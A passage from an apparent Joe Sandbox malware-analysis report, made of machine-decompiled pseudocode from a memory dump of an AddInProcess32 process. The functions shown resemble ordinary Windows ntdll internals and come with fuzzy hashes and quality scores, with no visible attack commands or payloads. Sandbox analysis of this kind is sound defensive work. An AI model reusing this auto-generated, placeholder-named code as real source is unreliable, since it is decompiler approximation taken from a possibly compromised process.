                              							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                              							asm("sbb esi, esi");
                              							_t120 =  ~_t50 & _t93;
                              						} else {
                              							_t120 = 0;
                              						}
                              					}
                              					if( !_t120 >= 0) {
                              						L19:
                              						_push( *_t105);
                              						E018995D0();
                              						 *_t105 =  *_t105 & 0x00000000;
                              						goto L20;
                              					}
                              					_t120 = E01867F65(_t119);
                              					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                              						__eflags = _t120;
                              						if(_t120 < 0) {
                              							goto L19;
                              						}
                              						 *(_t119 + 0x64) = _v12;
                              						goto L22;
                              					}
                              					goto L19;
                              				}
                              			}
                              0x0188051d
                              0x0188051f
                              0x01880524
                              0x00000000
                              0x01880524
                              0x01880515
                              0x01880517
                              0x018c4e7a
                              0x018c4e7c
                              0x00000000
                              0x00000000
                              0x018c4e85
                              0x00000000
                              0x018c4e85
                              0x00000000
                              0x01880517

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71783d3b3cb87783f6ecbd42d935a578ca12ca852abc23faae455838b43c02b2
                              • Instruction ID: aad5cd7da92fedb5c4639d47b4f3fdb8b000ecca7c55b5681a8193d8afc388dc
                              • Opcode Fuzzy Hash: 71783d3b3cb87783f6ecbd42d935a578ca12ca852abc23faae455838b43c02b2
                              • Instruction Fuzzy Hash: 7F914C31E042199FEB31AB6CC854BAD7BA4EB01B28F050269FA11EB2D1D774DF84C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E0187B944(signed int* __ecx, char __edx) {
                              				signed int _v8;
                              				signed int _v16;
                              				signed int _v20;
                              				char _v28;
                              				signed int _v32;
                              				char _v36;
                              				signed int _v40;
                              				intOrPtr _v44;
                              				signed int* _v48;
                              				signed int _v52;
                              				signed int _v56;
                              				intOrPtr _v60;
                              				intOrPtr _v64;
                              				intOrPtr _v68;
                              				intOrPtr _v72;
                              				intOrPtr _v76;
                              				char _v77;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr* _t65;
                              				intOrPtr _t67;
                              				intOrPtr _t68;
                              				char* _t73;
                              				intOrPtr _t77;
                              				intOrPtr _t78;
                              				signed int _t82;
                              				intOrPtr _t83;
                              				void* _t87;
                              				char _t88;
                              				intOrPtr* _t89;
                              				intOrPtr _t91;
                              				void* _t97;
                              				intOrPtr _t100;
                              				void* _t102;
                              				void* _t107;
                              				signed int _t108;
                              				intOrPtr* _t112;
                              				void* _t113;
                              				intOrPtr* _t114;
                              				intOrPtr _t115;
                              				intOrPtr _t116;
                              				intOrPtr _t117;
                              				signed int _t118;
                              				void* _t130;
                              
                              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                              				_v8 =  *0x194d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                              				_t112 = __ecx;
                              				_v77 = __edx;
                              				_v48 = __ecx;
                              				_v28 = 0;
                              				_t5 = _t112 + 0xc; // 0x575651ff
                              				_t105 =  *_t5;
                              				_v20 = 0;
                              				_v16 = 0;
                              				if(_t105 == 0) {
                              					_t50 = _t112 + 4; // 0x5de58b5b
                              					_t60 =  *__ecx |  *_t50;
                              					if(( *__ecx |  *_t50) != 0) {
                              						 *__ecx = 0;
                              						__ecx[1] = 0;
                              						if(E01877D50() != 0) {
                              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              						} else {
                              							_t65 = 0x7ffe0386;
                              						}
                              						if( *_t65 != 0) {
                              							E01928CD6(_t112);
                              						}
                              						_push(0);
                              						_t52 = _t112 + 0x10; // 0x778df98b
                              						_push( *_t52);
                              						_t60 = E01899E20();
                              					}
                              					L20:
                              					_pop(_t107);
                              					_pop(_t113);
                              					_pop(_t87);
                              					return E0189B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                              				}
                              				_t8 = _t112 + 8; // 0x8b000cc2
                              				_t67 =  *_t8;
                              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                              				_t108 =  *(_t67 + 0x14);
                              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                              				_t105 = 0x2710;
                              				asm("sbb eax, edi");
                              				_v44 = _t88;
                              				_v52 = _t108;
                              				_t60 = E0189CE00(_t97, _t68, 0x2710, 0);
                              				_v56 = _t60;
                              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                              					L3:
                              					 *(_t112 + 0x44) = _t60;
                              					_t105 = _t60 * 0x2710 >> 0x20;
                              					 *_t112 = _t88;
                              					 *(_t112 + 4) = _t108;
                              					_v20 = _t60 * 0x2710;
                              					_v16 = _t60 * 0x2710 >> 0x20;
                              					if(_v77 != 0) {
                              						L16:
                              						_v36 = _t88;
                              						_v32 = _t108;
                              						if(E01877D50() != 0) {
                              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              						} else {
                              							_t73 = 0x7ffe0386;
                              						}
                              						if( *_t73 != 0) {
                              							_t105 = _v40;
                              							E01928F6A(_t112, _v40, _t88, _t108);
                              						}
                              						_push( &_v28);
                              						_push(0);
                              						_push( &_v36);
                              						_t48 = _t112 + 0x10; // 0x778df98b
                              						_push( *_t48);
                              						_t60 = E0189AF60();
                              						goto L20;
                              					} else {
                              						_t89 = 0x7ffe03b0;
                              						do {
                              							_t114 = 0x7ffe0010;
                              							do {
                              								_t77 =  *0x1948628; // 0x0
                              								_v68 = _t77;
                              								_t78 =  *0x194862c; // 0x0
                              								_v64 = _t78;
                              								_v72 =  *_t89;
                              								_v76 =  *((intOrPtr*)(_t89 + 4));
                              								while(1) {
                              									_t105 =  *0x7ffe000c;
                              									_t100 =  *0x7ffe0008;
                              									if(_t105 ==  *_t114) {
                              										goto L8;
                              									}
                              									asm("pause");
                              								}
                              								L8:
                              								_t89 = 0x7ffe03b0;
                              								_t115 =  *0x7ffe03b0;
                              								_t82 =  *0x7FFE03B4;
                              								_v60 = _t115;
                              								_t114 = 0x7ffe0010;
                              								_v56 = _t82;
                              							} while (_v72 != _t115 || _v76 != _t82);
                              							_t83 =  *0x1948628; // 0x0
                              							_t116 =  *0x194862c; // 0x0
                              							_v76 = _t116;
                              							_t117 = _v68;
                              						} while (_t117 != _t83 || _v64 != _v76);
                              						asm("sbb edx, [esp+0x24]");
                              						_t102 = _t100 - _v60 - _t117;
                              						_t112 = _v48;
                              						_t91 = _v44;
                              						asm("sbb edx, eax");
                              						_t130 = _t105 - _v52;
                              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                              							_t88 = _t102 - _t91;
                              							asm("sbb edx, edi");
                              							_t108 = _t105;
                              						} else {
                              							_t88 = 0;
                              							_t108 = 0;
                              						}
                              						goto L16;
                              					}
                              				} else {
                              					if( *(_t112 + 0x44) == _t60) {
                              						goto L20;
                              					}
                              					goto L3;
                              				}
                              			}

                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187B9A5
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 885266447-0
                              • Opcode ID: 7f8f239f8738198137cc7b2dcb44a7ab75b2aee759b12a1dac66ea671bb663c2
                              • Instruction ID: 0e2552a09e1977429756d50c9cb39ed73fd635cde41e2af6eced0ac53950c0fc
                              • Opcode Fuzzy Hash: 7f8f239f8738198137cc7b2dcb44a7ab75b2aee759b12a1dac66ea671bb663c2
                              • Instruction Fuzzy Hash: B6513671A09345CFC721EF68C08092AFBE6BB88714F14496EE995C7355E730EA44CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E0185B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                              				signed int _t65;
                              				signed short _t69;
                              				intOrPtr _t70;
                              				signed short _t85;
                              				void* _t86;
                              				signed short _t89;
                              				signed short _t91;
                              				intOrPtr _t92;
                              				intOrPtr _t97;
                              				intOrPtr* _t98;
                              				signed short _t99;
                              				signed short _t101;
                              				void* _t102;
                              				char* _t103;
                              				signed short _t104;
                              				intOrPtr* _t110;
                              				void* _t111;
                              				void* _t114;
                              				intOrPtr* _t115;
                              
                              				_t109 = __esi;
                              				_t108 = __edi;
                              				_t106 = __edx;
                              				_t95 = __ebx;
                              				_push(0x90);
                              				_push(0x192f7a8);
                              				E018AD0E8(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                              				if(__edx == 0xffffffff) {
                              					L6:
                              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                              					__eflags = _t65 & 0x00000002;
                              					if((_t65 & 0x00000002) != 0) {
                              						L3:
                              						L4:
                              						return E018AD130(_t95, _t108, _t109);
                              					}
                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                              					_t108 = 0;
                              					_t109 = 0;
                              					_t95 = 0;
                              					__eflags = 0;
                              					while(1) {
                              						__eflags = _t95 - 0x200;
                              						if(_t95 >= 0x200) {
                              							break;
                              						}
                              						E0189D000(0x80);
                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                              						_t108 = _t115;
                              						_t95 = _t95 - 0xffffff80;
                              						_t17 = _t114 - 4;
                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                              						__eflags =  *_t17;
                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                              						_t102 = _t110 + 1;
                              						do {
                              							_t85 =  *_t110;
                              							_t110 = _t110 + 1;
                              							__eflags = _t85;
                              						} while (_t85 != 0);
                              						_t111 = _t110 - _t102;
                              						_t21 = _t95 - 1; // -129
                              						_t86 = _t21;
                              						__eflags = _t111 - _t86;
                              						if(_t111 > _t86) {
                              							_t111 = _t86;
                              						}
                              						E0189F3E0(_t108, _t106, _t111);
                              						_t115 = _t115 + 0xc;
                              						_t103 = _t111 + _t108;
                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                              						_t89 = _t95 - _t111;
                              						__eflags = _t89;
                              						_push(0);
                              						if(_t89 == 0) {
                              							L15:
                              							_t109 = 0xc000000d;
                              							goto L16;
                              						} else {
                              							__eflags = _t89 - 0x7fffffff;
                              							if(_t89 <= 0x7fffffff) {
                              								L16:
                              								 *(_t114 - 0x94) = _t109;
                              								__eflags = _t109;
                              								if(_t109 < 0) {
                              									__eflags = _t89;
                              									if(_t89 != 0) {
                              										 *_t103 = 0;
                              									}
                              									L26:
                              									 *(_t114 - 0xa0) = _t109;
                              									 *(_t114 - 4) = 0xfffffffe;
                              									__eflags = _t109;
                              									if(_t109 >= 0) {
                              										L31:
                              										_t98 = _t108;
                              										_t39 = _t98 + 1; // 0x1
                              										_t106 = _t39;
                              										do {
                              											_t69 =  *_t98;
                              											_t98 = _t98 + 1;
                              											__eflags = _t69;
                              										} while (_t69 != 0);
                              										_t99 = _t98 - _t106;
                              										__eflags = _t99;
                              										L34:
                              										_t70 =  *[fs:0x30];
                              										__eflags =  *((char*)(_t70 + 2));
                              										if( *((char*)(_t70 + 2)) != 0) {
                              											L40:
                              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                              											 *(_t114 - 4) = 1;
                              											_push(_t114 - 0x74);
                              											E018ADEF0(_t99, _t106);
                              											 *(_t114 - 4) = 0xfffffffe;
                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                              											goto L3;
                              										}
                              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                              											goto L40;
                              										}
                              										_push( *((intOrPtr*)(_t114 + 8)));
                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                              										_push(_t99 & 0x0000ffff);
                              										_push(_t108);
                              										_push(1);
                              										_t101 = E0189B280();
                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                              										if( *((char*)(_t114 + 0x14)) == 1) {
                              											__eflags = _t101 - 0x80000003;
                              											if(_t101 == 0x80000003) {
                              												E0189B7E0(1);
                              												_t101 = 0;
                              												__eflags = 0;
                              											}
                              										}
                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                              										goto L4;
                              									}
                              									__eflags = _t109 - 0x80000005;
                              									if(_t109 == 0x80000005) {
                              										continue;
                              									}
                              									break;
                              								}
                              								 *(_t114 - 0x90) = 0;
                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                              								_t91 = E0189E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                              								_t115 = _t115 + 0x10;
                              								_t104 = _t91;
                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                              								__eflags = _t104;
                              								if(_t104 < 0) {
                              									L21:
                              									_t109 = 0x80000005;
                              									 *(_t114 - 0x90) = 0x80000005;
                              									L22:
                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                              									L23:
                              									 *(_t114 - 0x94) = _t109;
                              									goto L26;
                              								}
                              								__eflags = _t104 - _t92;
                              								if(__eflags > 0) {
                              									goto L21;
                              								}
                              								if(__eflags == 0) {
                              									goto L22;
                              								}
                              								goto L23;
                              							}
                              							goto L15;
                              						}
                              					}
                              					__eflags = _t109;
                              					if(_t109 >= 0) {
                              						goto L31;
                              					}
                              					__eflags = _t109 - 0x80000005;
                              					if(_t109 != 0x80000005) {
                              						goto L31;
                              					}
                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                              					_t38 = _t95 - 1; // -129
                              					_t99 = _t38;
                              					goto L34;
                              				}
                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                              					__eflags = __edx - 0x65;
                              					if(__edx != 0x65) {
                              						goto L2;
                              					}
                              					goto L6;
                              				}
                              				L2:
                              				_push( *((intOrPtr*)(_t114 + 8)));
                              				_push(_t106);
                              				if(E0189A890() != 0) {
                              					goto L6;
                              				}
                              				goto L3;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: _vswprintf_s
                              • String ID:
                              • API String ID: 677850445-0
                              • Opcode ID: db2353ee540614c3a244ae085586e54c029789547c4b77d42f2b1c7f1683bfba
                              • Instruction ID: 4ec8f718e38fa5ee8bcfacacaa26aeb907bf988d5547219efd29b023b008efb6
                              • Opcode Fuzzy Hash: db2353ee540614c3a244ae085586e54c029789547c4b77d42f2b1c7f1683bfba
                              • Instruction Fuzzy Hash: FE51C071D002598EEF35CF688886BEEBBB1EF00714F1441A9D85AEB393D7705A45CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 70%
                              			E01903D40(intOrPtr __ecx, char* __edx) {
                              				signed int _v8;
                              				char* _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				char _v28;
                              				char _v29;
                              				intOrPtr* _v32;
                              				char _v36;
                              				char _v37;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				char* _t34;
                              				intOrPtr* _t37;
                              				intOrPtr* _t42;
                              				intOrPtr* _t47;
                              				intOrPtr* _t48;
                              				intOrPtr* _t49;
                              				char _t51;
                              				void* _t52;
                              				intOrPtr* _t53;
                              				char* _t55;
                              				char _t59;
                              				char* _t61;
                              				intOrPtr* _t64;
                              				void* _t65;
                              				char* _t67;
                              				void* _t68;
                              				signed int _t70;
                              
                              				_t62 = __edx;
                              				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                              				_v8 =  *0x194d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                              				_t34 =  &_v28;
                              				_v20 = __ecx;
                              				_t67 = __edx;
                              				_v24 = _t34;
                              				_t51 = 0;
                              				_v12 = __edx;
                              				_v29 = 0;
                              				_v28 = _t34;
                              				E01872280(_t34, 0x1948a6c);
                              				_t64 =  *0x1945768; // 0x77995768
                              				if(_t64 != 0x1945768) {
                              					while(1) {
                              						_t8 = _t64 + 8; // 0x77995770
                              						_t42 = _t8;
                              						_t53 = _t64;
                              						 *_t42 =  *_t42 + 1;
                              						_v16 = _t42;
                              						E0186FFB0(_t53, _t64, 0x1948a6c);
                              						 *0x194b1e0(_v24, _t67);
                              						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                              							_v37 = 1;
                              						}
                              						E01872280(_t45, 0x1948a6c);
                              						_t47 = _v28;
                              						_t64 =  *_t64;
                              						 *_t47 =  *_t47 - 1;
                              						if( *_t47 != 0) {
                              							goto L8;
                              						}
                              						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                              							L10:
                              							_push(3);
                              							asm("int 0x29");
                              						} else {
                              							_t48 =  *((intOrPtr*)(_t53 + 4));
                              							if( *_t48 != _t53) {
                              								goto L10;
                              							} else {
                              								 *_t48 = _t64;
                              								_t61 =  &_v36;
                              								 *((intOrPtr*)(_t64 + 4)) = _t48;
                              								_t49 = _v32;
                              								if( *_t49 != _t61) {
                              									goto L10;
                              								} else {
                              									 *_t53 = _t61;
                              									 *((intOrPtr*)(_t53 + 4)) = _t49;
                              									 *_t49 = _t53;
                              									_v32 = _t53;
                              									goto L8;
                              								}
                              							}
                              						}
                              						L11:
                              						_t51 = _v29;
                              						goto L12;
                              						L8:
                              						if(_t64 != 0x1945768) {
                              							_t67 = _v20;
                              							continue;
                              						}
                              						goto L11;
                              					}
                              				}
                              				L12:
                              				E0186FFB0(_t51, _t64, 0x1948a6c);
                              				while(1) {
                              					_t37 = _v28;
                              					_t55 =  &_v28;
                              					if(_t37 == _t55) {
                              						break;
                              					}
                              					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                              						goto L10;
                              					} else {
                              						_t59 =  *_t37;
                              						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                              							goto L10;
                              						} else {
                              							_t62 =  &_v28;
                              							_v28 = _t59;
                              							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                              							continue;
                              						}
                              					}
                              					L18:
                              				}
                              				_pop(_t65);
                              				_pop(_t68);
                              				_pop(_t52);
                              				return E0189B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                              				goto L18;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 50c772db132a655ed01dc9ccd5ed857becc20b0ed3e297c3c6bd1637666fb3d5
                              • Instruction ID: 3bf7ac692a91b04b1417e05c070ba540da0cea34b88b02e464d7306ceb44afb6
                              • Opcode Fuzzy Hash: 50c772db132a655ed01dc9ccd5ed857becc20b0ed3e297c3c6bd1637666fb3d5
                              • Instruction Fuzzy Hash: A9319AB1609302DFCB12DF68D58081ABBE9FF85715F054A6EE4889B291D730EE04CBD2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E01894A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				signed int* _v12;
                              				char _v13;
                              				signed int _v16;
                              				char _v21;
                              				signed int* _v24;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				signed int* _t32;
                              				signed int* _t41;
                              				signed int _t42;
                              				void* _t43;
                              				intOrPtr* _t51;
                              				void* _t52;
                              				signed int _t53;
                              				signed int _t58;
                              				void* _t59;
                              				signed int _t60;
                              				signed int _t62;
                              
                              				_t49 = __edx;
                              				_t62 = (_t60 & 0xfffffff8) - 0xc;
                              				_t26 =  *0x194d360 ^ _t62;
                              				_v8 =  *0x194d360 ^ _t62;
                              				_t41 = __ecx;
                              				_t51 = __edx;
                              				_v12 = __ecx;
                              				if(_a4 == 0) {
                              					if(_a8 != 0) {
                              						goto L1;
                              					}
                              					_v13 = 1;
                              					E01872280(_t26, 0x1948608);
                              					_t58 =  *_t41;
                              					if(_t58 == 0) {
                              						L11:
                              						E0186FFB0(_t41, _t51, 0x1948608);
                              						L2:
                              						 *0x194b1e0(_a4, _a8);
                              						_t42 =  *_t51();
                              						if(_t42 == 0) {
                              							_t29 = 0;
                              							L5:
                              							_pop(_t52);
                              							_pop(_t59);
                              							_pop(_t43);
                              							return E0189B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                              						}
                              						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                              						if(_v21 != 0) {
                              							_t53 = 0;
                              							E01872280(_t28, 0x1948608);
                              							_t32 = _v24;
                              							if( *_t32 == _t58) {
                              								 *_t32 = _t42;
                              								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                              								if(_t58 != 0) {
                              									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                              									asm("sbb edi, edi");
                              									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                              								}
                              							}
                              							E0186FFB0(_t42, _t53, 0x1948608);
                              							if(_t53 != 0) {
                              								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                              							}
                              						}
                              						_t29 = _t42;
                              						goto L5;
                              					}
                              					if( *((char*)(_t58 + 0x40)) != 0) {
                              						L10:
                              						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                              						E0186FFB0(_t41, _t51, 0x1948608);
                              						_t29 = _t58;
                              						goto L5;
                              					}
                              					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                              					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                              						goto L11;
                              					}
                              					goto L10;
                              				}
                              				L1:
                              				_v13 = 0;
                              				_t58 = 0;
                              				goto L2;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 1b5c2fce58ab02f1c86ea69681d6f7330abb691da3a601e15d5cf453532de726
                              • Instruction ID: 505139c03e6d95fc8be6b41ee544027d105f7e18fb059ad81cdbc069c6035e5b
                              • Opcode Fuzzy Hash: 1b5c2fce58ab02f1c86ea69681d6f7330abb691da3a601e15d5cf453532de726
                              • Instruction Fuzzy Hash: 0F3144322153019BCB22DF58CA80B2ABBE6FFC1B14F08042DE91AC7241CB74DA01CB86
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E01870050(void* __ecx) {
                              				signed int _v8;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr* _t30;
                              				intOrPtr* _t31;
                              				signed int _t34;
                              				void* _t40;
                              				void* _t41;
                              				signed int _t44;
                              				intOrPtr _t47;
                              				signed int _t58;
                              				void* _t59;
                              				void* _t61;
                              				void* _t62;
                              				signed int _t64;
                              
                              				_push(__ecx);
                              				_v8 =  *0x194d360 ^ _t64;
                              				_t61 = __ecx;
                              				_t2 = _t61 + 0x20; // 0x20
                              				E01889ED0(_t2, 1, 0);
                              				_t52 =  *(_t61 + 0x8c);
                              				_t4 = _t61 + 0x8c; // 0x8c
                              				_t40 = _t4;
                              				do {
                              					_t44 = _t52;
                              					_t58 = _t52 & 0x00000001;
                              					_t24 = _t44;
                              					asm("lock cmpxchg [ebx], edx");
                              					_t52 = _t44;
                              				} while (_t52 != _t44);
                              				if(_t58 == 0) {
                              					L7:
                              					_pop(_t59);
                              					_pop(_t62);
                              					_pop(_t41);
                              					return E0189B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                              				}
                              				asm("lock xadd [esi], eax");
                              				_t47 =  *[fs:0x18];
                              				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                              				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                              				if(_t30 != 0) {
                              					if( *_t30 == 0) {
                              						goto L4;
                              					}
                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              					L5:
                              					if( *_t31 != 0) {
                              						_t18 = _t61 + 0x78; // 0x78
                              						E01928A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                              					}
                              					_t52 =  *(_t61 + 0x5c);
                              					_t11 = _t61 + 0x78; // 0x78
                              					_t34 = E01889702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                              					_t24 = _t34 | 0xffffffff;
                              					asm("lock xadd [esi], eax");
                              					if((_t34 | 0xffffffff) == 0) {
                              						 *0x194b1e0(_t61);
                              						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                              					}
                              					goto L7;
                              				}
                              				L4:
                              				_t31 = 0x7ffe0386;
                              				goto L5;
                              			}





















                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 213ecd0fe9a283ebd2aad3bb7fad70017289e6fc32279ce7efde9465e137a3c5
                              • Instruction ID: 78a6b01125df5c0c53ee407781daac87e8c26025f00bfc3518c71f154d90c0cc
                              • Opcode Fuzzy Hash: 213ecd0fe9a283ebd2aad3bb7fad70017289e6fc32279ce7efde9465e137a3c5
                              • Instruction Fuzzy Hash: C0317A31601A048FD726CB28C880BA6B7E5FB89724F144569E59AC7B90EB75E901CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E01882581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912132) {
                              				signed int _v8;
                              				signed int _v16;
                              				unsigned int _v24;
                              				void* _v28;
                              				signed int _v32;
                              				unsigned int _v36;
                              				signed int _v37;
